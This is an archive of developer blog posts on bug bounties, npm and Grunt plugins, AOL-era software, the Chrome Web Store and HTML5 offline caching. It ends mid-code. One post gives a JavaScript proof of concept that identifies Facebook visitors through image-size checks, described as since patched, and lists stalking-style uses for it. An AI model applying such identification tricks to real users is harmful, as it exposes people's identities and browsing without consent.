Category Archives: Development Thoughts

Bug Bounty Redux

A couple of weeks ago I was having one of those Fridays where I was just kind of dragging. Right before I was about to clock out and go pick up my son, a message from “Facebook Security” popped into my inbox. Since I hadn’t submitted any reports since last year, I was confused. Was this because I had done something wrong? Was my account hacked?

I opened the message and read the following:

Remember this report? 🙂 Definitely an unusual timeline and one that should have been much, much shorter. We do have a fix for this that we’re finally working to deploy. We hadn’t forgotten about your report, though, and we still want to send a bounty of $1500 in appreciation. Again, it should have been sent way sooner, but we appreciate your patience with us and I assure you this timeframe is not the norm.

Whoa, what a way to end a week! I had to reread the submitted report twice to remember what it was about.

Last year I briefly got into bug hunting and had ended up submitting a few vulnerability reports. This particular report was put in late last Fall. It was kind of a complicated exploit, and for it to work, you either had to lock down your own friends list and target one or more of your friends, or target someone who had their own friends list locked down. Once that step was out of the way, you could set up your webpage to detect when these particular people visited your site. I thought it was too minor, but ended up submitting it after my office mate told me to go for it.

Originally I had heard back from Facebook’s security team that they were looking into it, but shortly after that correspondence I submitted two other reports and subsequently forgot about this one. Even though it’s been a while, it’s pretty cool they didn’t forget about it. Due to it being pretty obscure / minor, I wouldn’t have batted an eye if they had ignored the report.

Bing Bugs

I had a similar experience with Microsoft’s Security Center last year, though the outcome was more of a buzz kill. I had decided to take a look into their bounty program, and after poking around a bit, I found some CSRF bugs in Bing Rewards. The bugs allowed any third-party website to check whether a visitor was a member of Bing Rewards, get their point count, and change some of their settings (like what their reward goal was). Even though none of this was a big deal, I thought it was enough to at least get listed on their acknowledgments page.

Sadly, I was mistaken. After I filed the report, they generated an internal ticket and the bug was passed around. Then it was radio silence. Four months later I got an email with this message:

We investigated the reported issue and the behavior is by design to ensure Rewards user can earn credits. We will be closing this MSRC case, please let me know if you have any questions.

None of that made any sense. My impression was they didn’t care and just wanted to close out one of their old tickets. It made me a little sad, but thankfully I didn’t spend too much time investigating their services. If I ever get back into bug hunting, I now at least know to avoid their program.

patorjk.com Scrolling Text Time Waster Bug

A couple weeks ago a friendly visitor named Cayd reported a Path Disclosure bug in my Scrolling Text Time Waster. There’s no bounty program for this site, but it was definitely cool that he shot me an email letting me know about it. Since I’m now writing an article on bug hunting, I figured I’d give him a shout out.

figlet and grunt-figlet npm packages

Last month I discovered Grunt, which is described as a “JavaScript task runner” by its creators. What’s that mean? Well, it allows you to automate mundane tasks like JS-linting, JavaScript/CSS minifying, compiling LESS into CSS, watching files for updates, and other development tasks. I had personally been using makefiles for these types of tasks, but after coming across a Grunt plugin for inlining AngularJS templates, I ended up going down the Grunt rabbit hole and converting over my makefiles to gruntfiles.
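To give a rough idea of what a gruntfile looks like, here’s a minimal sketch (the plugin choices and file paths are just illustrative, not my actual setup):

// Gruntfile.js - a minimal, illustrative example
module.exports = function (grunt) {
    grunt.initConfig({
        // Lint the JavaScript source
        jshint: {
            all: ['src/**/*.js']
        },
        // Minify the JavaScript into a single file
        uglify: {
            build: {
                src: 'src/app.js',
                dest: 'dist/app.min.js'
            }
        },
        // Compile LESS into CSS
        less: {
            build: {
                files: { 'dist/app.css': 'src/app.less' }
            }
        },
        // Re-run the above tasks whenever a source file changes
        watch: {
            files: ['src/**/*'],
            tasks: ['jshint', 'uglify', 'less']
        }
    });

    grunt.loadNpmTasks('grunt-contrib-jshint');
    grunt.loadNpmTasks('grunt-contrib-uglify');
    grunt.loadNpmTasks('grunt-contrib-less');
    grunt.loadNpmTasks('grunt-contrib-watch');

    grunt.registerTask('default', ['jshint', 'uglify', 'less']);
};

Running “grunt” at the command line then kicks off the default task list.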

Once I had everything working with Grunt, I thought it might be fun to try and write my own plugin. Since Grunt is node.js based, I decided it might be neat to use the figlet.js library I wrote a while back to auto-generate ASCII banners for source code files. figlet.js was originally written to be browser-side only, so I had to do a little reworking to get it to work with node. However, after I had created an npm package for it, I wrote a simple grunt plugin around it called grunt-figlet. You can see the result of a test run of the plugin below.

/**
 * _________            .___      
 * \_   ___ \  ____   __| _/____  
 * /    \  \/ /  _ \ / __ |/ __ \ 
 * \     \___(  <_> ) /_/ \  ___/ 
 *  \______  /\____/\____ |\___  >
 *         \/            \/    \/ 
 * This is a message for the comment body.
 * More random text...
 */
function abc(a,b,c){console.log(a+b+c);}var a=1,b=2,c=3;abc(a,b,c);

My office mate pointed out that it sort of defeats the purpose of minifying, but I still think it’s cool. The Text to ASCII Art Generator has a similar code comment feature, though it supports more languages. I’ll probably add support for other commenting styles into the grunt plugin later on, though right now I’m not sure if Grunt is used for any non-web development type projects.
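If you’re curious what using the figlet package from node looks like, here’s a rough sketch of how a banner like the one above could be generated (the font name is just an example):

var figlet = require('figlet');

figlet.text('Code', { font: 'Standard' }, function (err, banner) {
    if (err) {
        console.error('Something went wrong:', err);
        return;
    }
    // Wrap each line of the banner in a JS block comment
    var comment = '/**\n' + banner.split('\n').map(function (line) {
        return ' * ' + line;
    }).join('\n') + '\n */';
    console.log(comment);
});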

After posting the project up, someone submitted a change to allow the figlet library to work at the command line. However, I decided to break it out into its own package, so someone could use the library without it interfering with an existing installation of figlet. Ultimately I think it would be cool if this command line app mirrored the behavior of the C-based app. I mentioned the idea on the figlet mailing list, and Ian (the I in FIGlet) seemed to like the idea. However, unless there’s suddenly a bunch of interest, right now that’s low on my list of things to do (though if you’re up for the task, feel free to submit changes to it).

Random updates for June

I feel like I work on this site a lot, but hardly ever post anything. Some of that may be due to me starting projects and then never finishing them though :P. Below is a collection of random thoughts and updates related to the site.

Gradient Image Generator

I’ve updated the Gradient Image Generator app and added support for CSS3. This update is in the style of what I was doing in my last post. I was going to do a “part 2” post, but I changed how I was updating apps when I got to the Keyboard Layout Analyzer.

Keyboard Layout Analyzer Overhaul

I’m currently overhauling the Keyboard Layout Analyzer. This was long overdue since the chart library it uses, Plotkit, is long dead (in terms of active development), as is Mochikit, the JS library Plotkit uses. The new front-end will be powered by AngularJS and use jqPlot for its charts. I tried to find a place for xkcd charts, but couldn’t come up with anything that didn’t seem totally out of place. I’ll go into more detail on the new front-end when it’s finally up, and I’m open to feature suggestions if anyone has any.

TAAG

I added support for MySQL comments in TAAG. I also removed its offline web app capability. Offline web apps seem to confuse users, and I’ve noticed downloading errors in Chrome while using it on my iMac. These errors seem to happen randomly, probably because there are lots of files that need to be cached, and they don’t seem to be repeatable. With the appcache API being in disarray, and after running into bugs in Chrome and FireFox, I’ve lost my enthusiasm for this particular web browser feature.

iMac

I’ve forsaken my Microsoft roots and purchased a souped-up, 27 inch iMac. I wasn’t a fan of Windows 8, the wires from my PC were making me nuts, and I thought it might be interesting to switch things up. I’ve only had the computer for a few months, but so far I’m pretty impressed. The big screen is amazing, I love being able to use terminals, updating software with brew is nice, and I’m a big fan of the magic mouse. The only downside so far has been that I can’t run Internet Explorer. I’m not sure how Mac users did web development 5 years ago…

Google Authorship

I feel like I’m the last person to know about this, but figured I’d mention it here anyway. Have you noticed people’s faces showing up next to certain search results? Apparently it’s called Google Authorship, and it’ll let you stick your picture next to webpages that you author. It only seems useful for blogs and news articles, but it’s kind of neat.

Spam Comments

When I get a blog comment that I think is spam, I google it to see if it’s been posted elsewhere. Usually my gut is right, and I see the comment posted on a dozen or so other blogs. Recently though, I came across a spam bot that had messed up and posted this:

{
{I have|I've} been {surfing|browsing} online more than {three|3|2|4} hours today, yet I never found any interesting article like yours. {It's|It is} pretty worth enough for
me. {In my opinion|Personally|In my view}, if
all {webmasters|site owners|website owners|web owners} and bloggers made good content
as you did, the {internet|net|web} will be {much more|a lot more} useful than ever before.
|
I {couldn't|could not} {resist|refrain from} commenting. {Very well|Perfectly|Well|Exceptionally well} written!|
{I will|I'll} {right away|immediately} {take hold of|grab|clutch|grasp|seize|snatch}
your {rss|rss feed} as I {can not|can't} {in finding|find|to find} your {email|e-mail} subscription {link|hyperlink} or {newsletter|e-newsletter} service. Do {you have|you've} any?
{Please|Kindly} {allow|permit|let} me {realize|recognize|understand|recognise|know} {so that|in order that} I {may just|may|could} subscribe.
...
}

As you can see from its setup, it appears to randomly choose synonyms for many of the words. It also has around two dozen comment templates (for the sake of brevity, I’ve only included the first two). I was actually kind of impressed – that’s pretty clever! They knew how people were checking for spam, and adapted to try and get around it. Pretty soon spammers will be using AI to analyze a blog’s content, and then use that information to post a relevant comment or follow-up comment, and bloggers will have no idea that they’re conversing with spambots.

Design Overhaul (part 1)

Like a book being judged by its cover, people tend to judge an app by its UI. Since jumping into a web development job 3 years ago, I’ve done a fair amount of client side work. I’ve helped redesign legacy applications with cool new UIs to lots of praise, even though the new apps had fewer features. And I’ve seen customers balk at feature-rich products that had so-so interfaces. And it makes sense: people like to use stuff that looks good, and if you can’t be bothered to put work into the design, what does that mean for the rest of the app?

I’m not a designer, and most of the stuff on this site was created before I really knew much about design. As a result, a lot of what’s here looks pretty meh. After writing my last post, I took a look at the text fader that’s on this site and was kind of embarrassed. I decided something needed to be done, so I started going through the various sections of this site and giving the layouts a much needed fresh coat of paint.

Mobile Version

The new designs aren’t amazing by any means, but I think they’re a step up, and hopefully they’ll provide a better user experience. I decided to use Twitter Bootstrap for a lot of the basic look and feel, since it looks great and plays well with jQuery. I’ve also been trying to make the new layouts responsive, so that they also look good on mobile devices.

I’m not allowed to bring a cell phone into work, so until last year, I avoided getting a smart phone. However, now that I have an Android, I use it all the time outside of work, and I’ve realized that I’ve made a big mistake by avoiding mobile development.

So now that the background is out of the way, what has actually been updated so far?

There are several more sections of this site I’m going to overhaul, but figured I’d do a write-up of what’s been done so far. I’ll also probably go back and revisit some of the sections I’ve already done if I get some better ideas. If you have any suggestions for anything just let me know.

Was Mark Zuckerberg an AOL add-on developer?


Facebook founder Mark Zuckerberg’s first website was recently found to still be online at Angelfire, an early free web hosting site. The Internet Archive confirms the site existed in its current form back in 1999, and the page’s source code is noted to be authored by “Mark Zuckerberg”. In addition, the author states they’re 15 (the age Mark was in 1999), and that they live outside of New York City (where Mark lived when he was 15). Motherboard provides further evidence, showing that the primary AOL account for the email listed on the site is a name commonly used by Mark Zuckerberg’s father.

The site screams 1999 web design, and is a very cool piece of internet archaeology. It should also be noted that it’s actually a pretty decent effort for the time for a 15-year-old (you only have to see the About section of this blog to see my effort at 16). However, the most interesting aspect of the site is “The Vader Fader”, an AOL add-on application that Zuck was heavily promoting on the site. Did this mean he was a part of the AOL add-on community? Did he use AOL progs? Did he develop in Visual Basic?


I downloaded The Vader Fader, and it is for AOL, and it was indeed written in Visual Basic. I tried firing it up, but got a message box saying I needed to be “online” and then the window on the left popped up. Ugh, I just want to see what this app looks like – I have to have AOL open? So I hunted down a version of AOL 4.0, installed it, and then tried running the app again. This time I got a runtime error 6 (overflow) – this was most likely caused by Zuck using Integers to store window handles instead of Longs. After Windows 98, window handles started being Longs instead of Integers.

Being persistent, I decided to download Windows Virtual PC and load up Windows 98. After burning AOL 4.0, The Vader Fader, my API Spy, and a handful of VB dependencies to CDs and then loading them up on the OS, I fired up The Vader Fader. This time it didn’t crash, but it still told me I needed to be online. Crap… how was I supposed to do that? I tried signing on, to see if by some fluke AOL was still active and letting random people sign in, but it didn’t work. It then occurred to me – how did progs back in the day determine if someone was signed on? I couldn’t believe I remembered this, but the way it worked was the app would find the main AOL window, and then look for a child window that had a caption that started with “Welcome, “.

I used my API Spy to change the caption of the existing AOL sub-windows to “Welcome, PAT or JK”, and then tried launching The Vader Fader again. This time it worked! Well, sort of. Instead of a message popping up, the caption of the main AOL window changed to “The Vader Fader”, and then nothing happened. I poked around, and the app was running in the background, but there was no main window and it didn’t appear to have done anything else. My best guess is the app worked by augmenting AOL chat rooms and IMs with fading options (why else would it change the main AOL window’s caption?). If that’s the case, there really wouldn’t be much to see, or really any way to see it – given that AOL 4.0 chatrooms and IMs are long defunct.

I was a little sad, but glad I’d at least gotten the app up and running. I also ended up digging through the app’s machine code a little for any other clues on how it was created, but didn’t really find anything interesting (other than the 10 color choices). Since the app used the same online detection mechanism as most other apps at the time, I wonder if Zuck used a common bas file like dos32.bas or genocide.bas – that’d be pretty cool if he did. It’s also kind of neat that the main app he was pushing was a fader, since that was the first app I released on this site. Anyway, I’ve spent way too much time on this. The site is a cool piece of internet archaeology and definitely worth poking around a bit if you have a few extra moments.

Facebook User Identification Bug

Time for Round 2

I decided to take another shot at Facebook’s Security Bug Bounty program. This time I ended up finding a bug that allowed a website to use Facebook to detect if a visitor was a particular person. After doing a write-up and submitting it to Facebook’s security team, I was awarded a $1,000 bounty. Below I’ll go into how I came across the issue and how the technique worked. Also, I don’t see myself going full-on bug hunter after this or anything like that; this has mostly just been a side-adventure that came from me being inspired by some blogs I read on bug hunting and application security.

How it worked

I noticed that the preview-image for a Facebook Badge was dynamically generated based on a user’s Facebook ID. There were some other configuration parameters, but for simplification, you can imagine the HTML looking something like this:

<img src="https://facebook.com/badge_edit.php?id=12345" />

When rendered, the image would look something like Figure 1. Since it could contain a user’s email address, my first instinct was to see if I could load other users’ badge previews and get their email addresses. However, when I tried this, a Facebook logo image loaded instead of the profile image (Figure 2).

Figure 1

Figure 2

This meant that only the user themselves could view their profile badge preview. However, even though the logo was put in place to block information from being leaked, I realized that it still leaked information. An external website could use JavaScript to silently load tons of profile badge previews with different user IDs, and then check their height and width. If one of these images loaded and it wasn’t the height and width of the Facebook logo, the website would know that that particular user was viewing their page.
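A proof of concept only takes a few lines of JavaScript. Here’s a rough sketch of the idea (the target IDs and logo dimensions are made up for illustration, and the hole itself has since been patched):

// IDs of the people we want to detect (made-up values for illustration)
var targets = { '12345': 'Boss', '67890': 'Frenemy' };

// Dimensions of the generic Facebook logo that loads for everyone else
// (illustrative numbers - the real check just compared against the logo's size)
var LOGO_WIDTH = 160, LOGO_HEIGHT = 60;

Object.keys(targets).forEach(function (id) {
    var img = new Image();
    img.onload = function () {
        // If the loaded image isn't the fallback logo, the visitor is that user
        if (img.width !== LOGO_WIDTH || img.height !== LOGO_HEIGHT) {
            console.log('Visitor appears to be: ' + targets[id]);
        }
    };
    img.src = 'https://facebook.com/badge_edit.php?id=' + id;
});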

This had a lot of interesting use cases. Someone could:

  • See if a particular acquaintance (boss, ex-girlfriend, frenemy) was stalking their Facebook feed or reading their blog.
  • See if someone famous was visiting their site.
  • Track the actions of certain people.
  • Show different content depending on who was visiting.

The one limitation was that a website could only check visitors against a list of certain people, but there are only so many people someone can know, and targeted attacks are aimed at particular people anyway.

Submitting the Bug

It was 1am Monday morning when I found this bug. When I realized what I could do with it, I had a rush of adrenaline and stayed up another 3 hours coding up a proof of concept and submitting a bug report. I really should have just gone to bed and written the report the following day (I’m supposed to be in at work by 9am), but it felt sort of like when you’re on the last level of a video game and your mind is buzzing with “holy crap, I’m going to beat the game!”

Similar to my last report, it took around two weeks for a security analyst to get back to me, and similar to last time, I was told it was interesting but that they needed to check with their engineering team. I was a little worried at this response – however, I felt that this time I’d found something that was really cool. Hell, it’s something that I would be tempted to use.

About a week later I noticed the bug was fixed and I received an email asking me to verify the fix. I did a few tests and then let them know that everything checked out. Shortly after this I got an email from the security team letting me know I was eligible for a $1,000 payout and that I needed to fill out a W-9.

Final Thoughts

In addition to Facebook, I also tried the white hat programs of a few other sites, and even ended up making Google’s honorable mention list and earning Reddit’s white hat profile badge. It’s kind of cool to get a little bit of recognition and pocket change for finding security holes, though part of me is unsure if it’s actually worth it, since it is a decent amount of work for no guaranteed return. However, overall I am glad I did it since I learned a little more about security and it felt great to score a few finds.

The Chrome Web Store Effect

It’s been about 5 months since I tried out Chrome’s Web Store for my Snake and Text to ASCII Art apps, and I figured I’d give an update on how putting them in Chrome’s Web Store has affected their usage.

My Snake game has sat around for about 4 years on this site, consistently getting an average of around 30-50 users a day. I originally wrote the game as a nostalgic tribute to my high school days, and it’s only undergone a handful of updates since its inception. Since this site was getting around 6.5k visits a day, 50 visitors means the app was accounting for around 0.77% of the site’s total traffic. After placing the app in Chrome’s Web Store, the daily usage began a steady rise, and the app has recently been getting between 900-1,000 visitors a day on the weekdays:

Snake Stats

Holy crap, the Chrome Web Store is awesome! Even with the bagillion other Snake games listed in the store, traffic has gone through the roof, with daily usage up 2,000%! But what about the TAAG app, has it also seen such a meteoric rise in traffic? Interestingly, even though both the Snake app and TAAG app have a similar number of installs, TAAG hasn’t seen a noticeable rise in traffic:

TAAG Stats

Hrm, this is kind of interesting. My guess is that this discrepancy is caused by the following factors:

  • TAAG is a utility app and isn’t really something that’s used often.
  • There is a high volume of people trying out games in the Web Store (installing them, and then uninstalling them if they don’t like it).

It’s hard to be certain of what’s actually going on, but I found these results to be pretty interesting, so I figured I’d share. I had wondered if the Chrome Web Store would be a positive for web app developers, and so far, from my limited experience, it seems like it could be a big plus, especially for game developers.

Facebook Bug Hunting

Image By laikolosse

Facebook has a neat security bug bounty program where developers, hackers, security researchers, and random Joes can submit security flaws to Facebook in exchange for a monetary reward and a place on their White Hat thank you list. Their minimum payout for finding a bug is $500, and that number increases based on the severity of the issue you report. Recently I’d read about amounts as high as $3,000 and $3,500 being paid out, and while this isn’t a ton, it’s definitely a nice amount of pocket change.

Since I was on break with my newborn last month, I decided to take a stab at uncovering an issue myself. Finding bugs is more about being clever than it is about being smart, and I figured the surface area for security issues on Facebook had to be pretty big.

I started out my journey by setting up a couple of test accounts in the Facebook sandbox. At first I tried a number of broad attacks – generic CSRF attacks, generic XSS attacks, faking email headers when sending email to an @facebook.com address, and lots of other really obvious things. Nothing seemed to work, and Facebook seemed to be a more hardened application than I had originally thought.

Original Image By javier.reyesgomez

At this point most people would get bored and move on, but I’m a little more stubborn than most people. I regrouped and realized my current path was fruitless. What I really needed was focus. I needed to look at one feature and see if I could find a hole in it. After surveying the different privacy settings, I decided to see if I could get around the setting that allowed someone to hide their friends list from their friends.

I poked and prodded and looked at everything related to the listing of a user’s friends. Finally I noticed something odd about one of the ajax calls Facebook was making under the covers. I was able to get it to return an error if a certain user parameter wasn’t a friend or a friend of a friend. Hrm, this was interesting. This meant I could do a check to see if a user was my friend or a friend of one of my friends. I wondered if this check factored in friends that were hidden from me. I rearranged the friend relationships in my test accounts and tried it out. Sure enough, the check didn’t respect hidden friends. This meant I could check if certain people were on the friends list of friends who were hiding their friends from me. If I only had one friend hiding their friends list from me, I could definitively check if certain people were on their friends list.

I ran some more tests, and with the consent of my friend Joel, confirmed the issue on the production version of Facebook. I then wrote up a test case (an attacker friends a victim, the victim accepts the friendship but hides everything from them) and submitted the how-to steps to Facebook’s Security Team.

And then I waited. Two and a half weeks came and went. I began to think my submission had been ignored when a message popped into my inbox from Facebook’s Security Team. They apologized for the delay, were very polite, and told me they thought the trick was pretty interesting. However, they wanted to double check with their Privacy Team to confirm how certain behavior was supposed to work and then they’d get back to me. They also mentioned they were going through a large backlog of issues. This made me curious as to how many submissions they get a day. Interestingly, around the time of this email I saw another individual go public with a bug they’d found due to not hearing back about a report quickly enough.

I was hopeful after the first email. The trick allowed someone to obtain information about their friends that was supposed to be hidden. It wasn’t the greatest find, but it was a neat little trick. However, the following week they emailed me saying that while they thought it was a cool trick, they felt it was an acceptable risk and that planned updates they were rolling out would eliminate it anyway.

The wind came out of my sails, and I felt like the achievement had slipped through my fingers. I still applaud them for setting up such a system, and being able to work in a sandboxed version of Facebook to try out different techniques is really cool. However, I’m left with mixed feelings. Though then again, if you’re bored and just want to try and hack Facebook, it’s a fun way to spend a few hours.

Update 2013/02/27: I got confirmation a few days ago of a 1k reward on another bug I submitted. I may do another post on it, or may just make a short update here.

Trying out Chrome’s App Store for the Web after falling down the W3C Widget Rabbit Hole

In my last post I discussed offline storage for web apps, and that I wasn’t sure how users were supposed to know that certain apps worked offline. Google Chrome has come up with a neat solution for this that allows users to “install” web apps via their Chrome Web Store. I’d played around with its previous incarnation, when it was the Chrome Extension Gallery, but I hadn’t really been back since it opened up to web apps and changed its name.

Installed App

The Chrome Web Store is interesting because you can submit both packaged apps and hosted apps. A hosted app is simply a zip file containing a metadata file and some icons. The metadata file explains general information like the URL for the app and whether it works offline or not.

Installing a hosted app is sort of a fancy way of bookmarking it, but the fact Chrome tells you whether it works offline or not is a big plus. This solves the issue of letting users know that an app’s URL will work even when they don’t have an internet connection.
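For reference, the metadata file is a small manifest that looks roughly like this (app name and URLs are placeholders):

{
    "name": "JavaScript Snake",
    "description": "The classic game of Snake.",
    "version": "1.0",
    "app": {
        "urls": [ "http://example.com/games/snake/" ],
        "launch": { "web_url": "http://example.com/games/snake/" }
    },
    "icons": { "128": "icon_128.png" },
    "offline_enabled": true
}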

This is exactly the kind of thing I was looking for! To try it out, I decided to create hosted apps of my Text to ASCII Art Generator and JavaScript Snake Game:

Both work offline, and I plan to create hosted apps of some of my other programs too, but for now I’m just testing the waters. FireFox will also soon launch a web app store called The Mozilla Marketplace. Its setup will be similar to Chrome’s, though it’ll be slightly more feature-rich, allowing you to run web apps like desktop programs. This feature is similar to the idea behind W3C Widgets, though W3C Widgets seem to have fallen out of favor.

As an aside, before I ended up at Chrome’s Web Store, I took a detour through the world of W3C Widgets. I hadn’t heard of them before, and unless the tides change, I may not hear much about them again. However, I figured I’d write up what I learned, since they seem to be one of the least popular pieces in the HTML5 puzzle.

W3C Widgets?

While researching offline web storage, I was bothered by the fact that normal users would have no idea that certain URLs still worked when they were offline. With this concern, I ended up emailing the W3C’s fixing-appcache mailing list because I could only find a small bit of discussion on the topic, and that discussion didn’t come to a consensus about what to do. The response I got was pretty interesting, and made me realize there were areas of the HTML5 world that I hadn’t seen:

This is essentially what the Widgets spec is supposed to achieve.  See
here for an example of a widget configuration:

http://www.w3.org/TR/widgets/#example-configuration-document

It makes sense to split packaging a website from providing offline
storage/caching technologies, since the two are different solutions to
different problems.  It's true that there is some crossover,
especially if a widget includes content in its package.  But the
widgets spec has its own problems, not least of which is a terrible
name.

Letting users know that your site will work when offline doesn't seem
like a terribly difficult problem to solve at the application level,
to be honest. I think as a developer I'd rather browser vendors spend
their time on other stuff :-).  But it's certainly a fair point, and
does need to be considered as part of the UX of your app.

After thinking about it, he was right about separating out the packaging of an app from its offline storage capability. However, what was this widgets spec he mentioned? I’d never heard of W3C Widgets, so I decided to do some research.

W3C Widgets are essentially packaged web apps. In fact, at one point, ppk proposed that they be put under the buzzword “HTML5 apps”. The W3C Widget spec discusses a format similar to Chrome extensions. You have a zip file of a directory structure containing HTML, CSS and JavaScript files, with a config.xml file that explains the basic metadata of the widget. Widgets can be embedded within a webpage or run from a user’s desktop. Not exactly what I was looking for, but it sounds kind of neat. Why had I never heard of this before? I did some more googling and the vast majority of the blogs and news regarding W3C Widgets seemed to be from 2009 or 2010. I could find nothing on Chrome, FireFox or IE implementing the spec – even though as of September 27, 2011, it became an official W3C recommendation.
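To give you an idea of the format, a bare-bones config.xml looks something like this (loosely based on the example in the spec):

<?xml version="1.0" encoding="UTF-8"?>
<widget xmlns="http://www.w3.org/ns/widgets"
        id="http://example.org/exampleWidget"
        version="1.0">
    <name>Example Widget</name>
    <description>A bare-bones example widget.</description>
    <icon src="icon.png"/>
    <content src="index.html"/>
</widget>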

I did, however, find a handful of projects that used the spec. While there wasn’t a lot of buzz around W3C Widgets, there appeared to be enough going on with them that they weren’t in danger of falling into the abyss, at least not yet. Below is a list of the projects I found with some notes I made on them.

  • Opera’s Web Browser – Opera appears to have fully embraced W3C Widgets and is using the spec for Opera extensions. They’ve also set the browser up so that it will run widgets that you launch from your desktop. So it’s basically letting you create native-ish HTML5 apps. I find it peculiar that no other vendor has embraced W3C Widgets like Opera has.
  • Apache Wookie – This appears to be a widget environment and it reminds me of the OZone Widget Framework. Though Apache Wookie runs W3C widgets while OZone runs OZone widgets.
  • Phonegap – This framework allows developers to create HTML5 apps that can be distributed in mobile phone app stores. Its app configuration is based on the W3C Widget spec.
  • Wholesale Applications Community (WAC) – “An allegiance of telecommunications firms and others working together to create a common mobile platform” [ref]. W3C Widgets are a part of what they’re doing. However, according to this article, they ended up failing.

So each of these projects is kind of cool, but none of them addressed the original problem I had – how the hell are users supposed to know they have web apps installed on their computers that will work when they’re offline? And if W3C Widgets are the answer, why aren’t the major vendors adopting them? Eventually I had some nice people direct me towards the Chrome Web Store, and it was also nice to find out that FireFox will soon have its own web store too. Hopefully IE10 will do something similar when it comes out.

Even though I didn’t find them useful, it was interesting to learn about the existence of W3C Widgets. I’m not sure why they seem to have failed, as they’re essentially a way of packaging HTML5 apps. Though then again, I do think Chrome’s manifest is a lot nicer than the config.xml that the W3C Widget spec detailed.

Notes on Offline Web Storage for TAAG

After you’ve visited it at least once, the Text to ASCII Art Generator (TAAG) will now work even when you don’t have an internet connection. I had a user request this, so I figured I’d add it in for them and anyone else out there who may want to use the app offline.

Offline web applications are one of the new capabilities being introduced with HTML5. An offline web application has its files downloaded and permanently installed in a web browser’s application cache. This allows users to go to an app’s URL and have it work even when they aren’t online. It’s a smart idea, but it has some interesting pros and cons. In this entry I’ll detail what I did to set TAAG up to work offline, detail some issues I ran into, and provide some notes for anyone looking to create an offline app.

The first step in creating an offline web application is to create a manifest file which tells the browser which files it should store in its application cache, which files it should try getting from the network, and, if offline, which files it should use in place of certain standard files. Any HTML files that reference this manifest will be implicitly added to the CACHE section of the manifest, and after a user’s first visit, all cached data will come from the application cache, even if a user F5’s the page. The application cache is only ever updated when the manifest file is updated, and even then, it will take 2 visits for a user to see any updates. This is because when a user visits the app’s URL, the application will be read from the cache, the browser will then see that the manifest has been updated, and it will then update the application cache for the user’s next visit. These idiosyncrasies are a bit to take in, but once you know what’s going on it’s not that bad. Here’s what a sample manifest file would look like:

CACHE MANIFEST
# This is a comment.
# The cache is only ever refreshed when changed.
# Last updated: 2012.08.18

# The CACHE section indicates what we want cached.
# The HTML file linking to this manifest is auto-added to this list.
CACHE:
one.jpg
two.jpg
jquery.js?12345

# The NETWORK section indicates which non-cached files should be 
# obtained from the network. This will almost always be "*".
NETWORK:
*

# The fallback section allows us to setup "fallback" pages to use 
# when offline.
FALLBACK:
page2.htm page2-is-offline.htm

An HTML file linking to this manifest might look like this:

<html manifest="my.appcache">
<head><title>Test</title><meta charset="utf-8"></head>
<body>
<div>Some text</div>
<img src="one.jpg"/>
<img src="two.jpg"/>
<script src="jquery.js?12345"></script>
</body>
</html>

And one last gotcha – to keep the manifest file from being cached by the browser, and to ensure the manifest is served with the correct mime type (an incorrect mime type will keep the manifest from being recognized), we need to update the web server’s configuration. For Apache, we’d add the following rules to our .htaccess file:

AddType text/cache-manifest .appcache

<Files *.appcache>
    ExpiresActive On
    ExpiresDefault "access"
</Files>

That should do it! With this technique your users will now be able to use your apps even when they don’t have an internet connection. I find this cool because it makes web apps more useful and puts them a step closer to supplanting Desktop apps. However, there are unfortunately a number of issues that have held offline web apps back, and they’re worth mentioning.

Issues with application caching

A lot of people aren’t happy with how application caching currently works. The W3C has set up a working group that’s discussing possible improvements, though hopefully the main components of the current spec will continue to work. However, I do feel like they need to make some changes. Below I’ll list my biggest concerns.

  • How would users know that certain URLs still work when they’re offline?

    I don’t understand how this isn’t the most important issue for offline applications. Without someone manually telling you that you can use a particular application while offline, I don’t see how someone would think they could browse to example.com/webapp and expect it to work when they didn’t have an internet connection. In their current form, I only see offline applications as useful to techies or people in the know.

    It’d be nice if offline applications could provide an icon, name, and description, and then browsers could show users which offline applications they had installed. It could be argued that this is a browser feature, but bookmarks are a browser feature too, and all browsers allow webpages to provide a favicon for bookmarking purposes. Whatever the case, there should be a way to let users know certain web pages/apps work offline.

    I’ve only seen this discussed once, and the people involved didn’t come to any conclusions, so I’m not too hopeful on this one. However, I think it’s probably the most important point, since no users = no usage.

    2012.09.01 Edit: Someone alerted me that there is a Widgets spec currently in the works that’s supposed to solve this issue. I haven’t taken a good look through it yet, but it’s good to know there are attempts to solve this problem.

  • Fresh updates aren’t served immediately / F5 doesn’t break the cache / the page that links to the manifest has to be cached.

    This seems to be the most popular feature request, though after reading spec author Hixie’s take on the issue, I sort of agree that many of the use-cases for using the application cache in this way are very similar to straight up HTTP caching. Though it would be nice if an app used the HTTP cache while online and this cache synced with the application cache, which would then be used when a user was offline.

    Around two months ago, a new feature was added to the spec in an attempt to address this. It takes the form of a new setting that gets added to the manifest:

    SETTINGS:
    prefer-online
    

    It’s explained here, though there’s some debate on whether it’s the right solution, and I was unable to get it to work in Chrome or the nightly FireFox build, so I’m not sure how it works or if it actually solves the problem.

Other Notes

  • Chrome was easier to work with than FireFox

    Chrome will print to the console as it’s loading the application into the cache, so you know instantly if there’s a problem or not. FireFox didn’t do this and that made it a bit more annoying to work with.

  • Listing installed applications

    • For Chrome, browse to the URL “chrome://appcache-internals/”
    • For FireFox, in the menu, go to: “Tools>Options>Advanced>Network” and see the section on “Offline Web Content and User Data”.

  • In the manifest, URLs need to be URL encoded and query strings need to be included

    Kind of obvious, but worth mentioning.

  • The popular iframe trick doesn’t work in FireFox

    There is a popular trick that aims to allow an HTML page to use the application cache while not being cached itself. It attempts this by having the page include an iframe with an HTML tag that links to the manifest. From my own tests, this trick works in Chrome but not in FireFox.

    2012.09.10 Update: After updating to FireFox 15, it seems to work now.

  • JavaScript API

    I didn’t go into it here, but there’s also a JavaScript API for the application cache (there’s a small sketch of it after this list). See the “Additional Resources” section below for more information.

  • What would happen if every website wanted to work offline?

    The space on a user’s computer is finite. I’m not sure how offline storage will work if offline apps end up becoming very popular in the future. Maybe the solution is to focus on installable apps which have the option of working offline – and users can pick and choose what they want installed?
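For the curious, here’s a tiny sketch of the JavaScript API mentioned above – it just listens for the standard window.applicationCache events and swaps in a freshly downloaded cache (nothing here is specific to TAAG):

var appCache = window.applicationCache;

// Fired when a new version of the cached files has finished downloading
appCache.addEventListener('updateready', function () {
    if (appCache.status === appCache.UPDATEREADY) {
        appCache.swapCache(); // switch over to the new cache
        if (confirm('A new version of this app is available. Reload now?')) {
            window.location.reload();
        }
    }
}, false);

// Fired if the manifest or one of the cached files fails to download
appCache.addEventListener('error', function (e) {
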